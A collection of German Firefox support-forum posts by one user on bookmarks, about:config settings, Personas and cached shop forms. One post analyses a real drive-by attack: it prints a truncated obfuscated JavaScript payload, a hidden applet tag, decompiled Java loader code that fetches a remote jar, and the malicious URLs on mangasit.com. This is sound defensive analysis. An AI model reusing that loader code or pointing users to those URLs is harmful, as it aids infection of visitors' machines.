Beiträge von boardraider

Exportiere sie im alten Profil als HTML und füge sie im neuen über Import wieder ein.

Zitat

und nicht installiert werden darf.

Portable Version verwenden und damit lediglich den Import durchführen. Anschließend die Lesezeichen wieder im Fx exportieren und transferieren.

https://www.camp-firefox.de/forum/viewtopic.php?f=8&t=77690
Grundsätzlich gilt aber auch hier, dass Frontpage eine wenig geeignete Software zum Erstellen von Webseiten darstellt.

Unter about:config, welchen Wert habt signon.autofillForms?
Du lässt Formulardaten speichern?

Wieso nutzt du nicht die Import-Funktion im Datei-Menü?
Die exportierte Version des IEs muss nicht zwangsweise kompatibel mit der Struktur des Fx sein.

Quelle: Brummelchen

Zitat von Brummelchen

Das iframe steht immer noch auf mangasit - immer noch ohne Inhalt.
[...]
Firefox möchte Java haben, nutze ich nicht, ist nicht mal installiert.

Dann scheint mir aber doch ein Inhalt dort gewesen zu sein. Oder wieso sollte Firefox denn sonst dort Java wollen?

Zitat von NightHawk56

Ein weiterer Hinweis: suche ich mit http://ixquick.com/ nach "thomashawk" kommt von avast trotz erlaubtem Prefetching keine Warnung.

Da ixquicks keine prefetch-Links verwendet wie Google, wird es da auch nicht zu einer solchen Meldung kommen. Siehe dazu den Beitrag von .Ulli weiter oben.

Zitat von Brummelchen

Was mir allerdings persönlich auffällt - wie kann man als Webseitengestalterin auf einem
unsicheren Browser aufbauen? Eigentlich sollte es u.a. Aufgabe sein, auf solche Misstände
hinzuweisen und nicht bewusst auf solche Sicherheitslücken hinzuarbeiten...!?
[...]
Webmaster, die so ein Element noch nutzen, gehören mMn erschlagen.

Auch wenn man zwischen Arbeit und persönlicher Nutzung unterscheiden muss, da beim Webdesign durchaus auch veraltete Browser berücksichtigt werden, so stellte Milla dies hier als Problem bei der privaten Nutzung eines alten Fx dar. Und da ist die Kritik von Brummelchen durchaus in der Sache richtig. Wenn man es nicht schafft den Fx 3 zum Laufen zu bekommen (Gründe seien einmal dahingestellt), dann sollte man eben einen anderen Browser verwenden. Eine unsichere, alte Version ist an der Stelle keine Option und von einem Webdesigner erwarte ich persönlich so viel Vernunft! Schließlich sind diese auch für die Sicherheit von Webanwendungen zuständig und da kommen mir persönlich Zweifel an der fachlichen Eignung, wenn man privat derart schludert.

Die Meldung dürfte sich durchaus auf den eingebundenen IFrame von mangasit.com beziehen. Dort erhalte ich folgenden obfuskierten JS-Code:

<script language="JavaScript" type="text/javascript">this.uP='';var wPM;var fW;if(fW!='nSZ' && fW!='lA'){fW='nSZ'};var aN;if(aN!='vS' && aN!='eBG'){aN='vS'};wPM="37333337343d3233781b072911097968203d287a276434206d0e176b176c7f1a6f176603387c370f6b312d3c21782c3d160f0f1a3248362a382126332324133632246c3a2a39263533042b1f373d2b037e643f2324273907476a7e322719"+"121401180b4f2c736b7544322f2c2d3f1f2d0873602e26207d70793c742a3a761c2e7d336b67282f2d0313051c1f7e7d3226731a3f2f0b313e0b241f6f7c3238292a3a737e5e7b4563626829353b0707030f076e722a2426002770393a23"+"2f056429276f6d2c3c362f717b7f756...
(gekürzt)

Schon allein die Verwendung solcher Verschleierungen führt i.d.R. zur Erkennung durch Scanner, wenn auch oftmals nur generisch und auf Verdacht. In dem Fall aber erzeugt der Code mindestens ein Java-Applet:

<applet code="evilTook.class" id="youAsIsnt" name="youAsIsnt" height="1" width="1"></applet>

Die class-Datei findet sich natürlich auch:
http://mangasit.com/lib/evilTook.class

Durch einen Decompiler gejagt und gekürzt:

void fhx3oCpL()
    {
        try
        {
            URL url = getCodeBase();
            String s = url.toString();
            String s1 = (new StringBuilder()).append("jar:").append(s).append("thatGalleyComes.php!/").toString();
            ClassLoader classloader = getClass().getClassLoader();
            sxWldX2S = URLClassLoader.newInstance(new URL[] {
                new URL(s1)
            }, classloader);
        }
        catch(Exception exception) { }
    }


    public void init()
    {
        cR9I4SMHF(kpclMGq4M, 80);
        fhx3oCpL();
        guaCyQuh = 5000;
        aBi4Eci89(guaCyQuh);
        pClpZ7o44(guaCyQuh);
        Class class1;
        try
        {
            class1 = Class.forName("x", true, sxWldX2S);
        }
        catch(Exception exception)
        {
            qLXm3MDP8z(guaCyQuh);
        }
    }


    URLClassLoader sxWldX2S;
    Inflater tab[];
    int guaCyQuh;
    static String kpclMGq4M = "\u9C60\350\000\u5D00\uED83\uB807\uC56B\u7E9E\u4CB9\004\u3100\u0D44\u831A\u04E9\uF775\uF497\u1A5E\uC068\u7EAE\uC56B\u72E6\u85E0\uF592\uD91B\uF533\uCD33\u7775\u85E0\uF3AA\uB92B\u2615\u2D57\u7D15\uC56B\uEB13\uC6DA\u7E9E

Die über jar: geladenen Datei ist:
http://mangasit.com/lib/thatGalleyComes.php

Für diese gilt:
http://www.virustotal.com/analisis/4084d…a6e9-1262769915

Aus den Beobachtungen ergibt sich hier als Fazit:
Es handelt sich hier nicht um ein False-Positive, sondern um einen realen Angriff. Sowohl die Webpräsenzen thomashawk.com als auch mangasit.com sind als kompromittiert anzusehen (vgl. dazu http://www.google.com/safebrowsing/d…m/lib/index.php und das Einbinden von mangasit.com via IFrame auf thomashawk.com). Wie die Erkennung von einzelnen Scannern funktioniert, kann hier auch unterschiedlich sein, spielt bei der Betrachtung aber eine untergeordnete Rolle.
Zu Untersuchen bliebe natürlich, warum das Fx-Profil die Seite aufgerufen hat. Da kein Interesse mehr an einer Untersuchung besteht, kann man das an der Stelle abbrechen. Ich vermute aber, dass das Profil nicht ausreichend bereinigt wurde.

Zitat

und ich hatte den eigentlich gerade vor kurzem erst neu aufsetzen lassen, wenn ich meinen Kumpel nun frage, ob er das schon wieder macht ist er sicherlich genervt vom jungen Dummchen

Dann bitte ihn dir ein eingeschränktes Konto für die Nutzung deines Systems einzurichten und dir zu zeigen, wie du für Software-Installationen in ein Admin-Konto wechselst.

Zitat

oder besser gesagt warum sie nicht daran gehindert wird ist mir aber nicht ganz klar.

Wie soll Software ohne Richtlinie zwischen legitimen Einsatz und Werbung unterscheiden?

Zitat

Es muss doch möglich sein auch Firefox mit wenigen Mausklicks beizubringen, dass er von mir ungewollte Seiten sofort wieder schließt.

https://addons.mozilla.org/en-US/firefox/addon/1154

Über die places.sqlite wäre ein Umbenennen durchaus möglich. Wenn auch nicht zu empfehlen, da es durchaus negative Seiteneffekte geben kann, bis hin zu einer nicht mehr funktionierenden Lesezeichen-Verwaltung. Aber wer will, kann es auf eigenes Risiko durchaus versuchen. :twisted:

https://bugzilla.mozilla.org/show_bug.cgi?id=516168

Zitat

Ihre Begründung war, dass dies an Firefox liegt, da die Seiten gespeichert werden. Es wurde bei erneutem Öffnen von Firefox das Kaufformular erneut gesendet. Ist dies tatsächlich möglich/wahr?

Der Fx legt ggf., wie jeder andere Browser auch, Seiten im Cache ab. Darüber hinaus merkt sich der Fx auch an verschiedenen Stellen, welche Seiten geöffnet waren oder sind.
Neben diesen grundsätzlichen Gegebenheiten ist so etwas theoretisch möglich, wenn der Webshop schlecht implementiert ist. Insofern ist aber nicht der Fx "schuld", sondern die schlechte Webshop-Software bzw. -Konfiguration.
Da du auf einen Zeitabstand von mehreren Tagen verweist und du den Fx inzwischen sicherlich mehrmals verwendet hast, fallen Session-Restore-Mechanismen i.d.R. raus. Über Erweiterungen schweigst du dich aus, daher bleiben nur manuelle Aufrufe in Form eines Lesezeichens oder einem Zugriff über die Chronik. Du müsstest also eine bestimmte Adresse erneut aufgerufen haben, die dann bei schlechter Implementierung des Shops den Vorgang erneut anstößt.

Dafür eine extra Erweiterung ist unnötig. Unter about:config den Wert browser.tabs.loadBookmarksInBackground auf true setzen.

Die Signaturen zu den Sourcen sind valide. Dann müsste schon der Mozilla-Server samt Schlüsselphrase geknackt sein. Wie fällt die Signaturprüfung bei dir aus? Falls gültig, ist ein Fehlalarm deines Sicherheitssoftware wahrscheinlicher. Wende dich diesbezüglich an Kaspersky.

Seit wann Personas in den Zweig gewandert ist, habe ich nicht geprüft. Aber da RC feature-vollständig sind, sollte das in jedem RC enthalten sein.

Allgemeine Fehlersuche für Firefox

Im Safe-Mode lässt sich schlecht das Verhalten eines Add-ons testen.

Gary1
In einem neuen Profil nur mit der Erweiterung Personas getestet?

Grundsätzlich kannst du das Problem aber auch hinten anstellen. In wenigen Tagen gibt es den Fx 3.6. Da ist Personas direkt intergiert. Die Erweiterung entfällt dann.

Zitat

auf meiner Webseite einen Link eintrug

Denkst du nicht, es wäre hilfreich die Seite zu nennen und den genauen Vorgang zu dokumentieren? Das ist keine Ratecommunity, sondern ein Supportforum.
Ansonsten:
Anleitung für Fragen im Forum